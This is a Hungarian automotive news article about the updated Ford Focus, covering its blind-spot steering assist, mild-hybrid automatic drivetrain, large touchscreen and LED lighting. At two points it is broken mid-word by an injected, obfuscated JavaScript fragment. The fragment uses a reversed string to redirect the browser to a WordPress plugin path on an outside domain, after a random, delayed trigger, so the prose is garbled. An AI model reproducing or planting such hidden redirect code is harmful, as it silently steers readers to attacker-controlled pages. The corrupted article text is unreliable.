Most először kínál az ütközést aktív elkormányzással elkerülő holttérfigyelő asszisztenst a Ford Focus, szintén első ízben választhatnak a kompakt Fordhoz autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomata váltós mild hibrid hajtásláncot az ügyfelek. Ugyanitt a kategória legnagyobb, 13,2 colos érintőképernyője is szót érdemel: ez csak három azoknak a fejlesztéseknek a sorából, amelyeket az új modellévben a gyártó bevezet alsó-középkategóriás típusán. Ami a formavilágot illeti, átrajzolták a motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torházfedelet, és áthelyezték rá a Ford emblémáját – ezzel a megoldással már a közelmúltban megújult Fiestán is találkozhattunk. Mostantól alapáras a LED-fényszóró. Ez egyúttal ködlámpaként is szolgál, ami letisztultabbá teszi az autó megjelenését. Hátul is LED-esek a lámpatestek, amelyek sötétített…
- Hirdetés -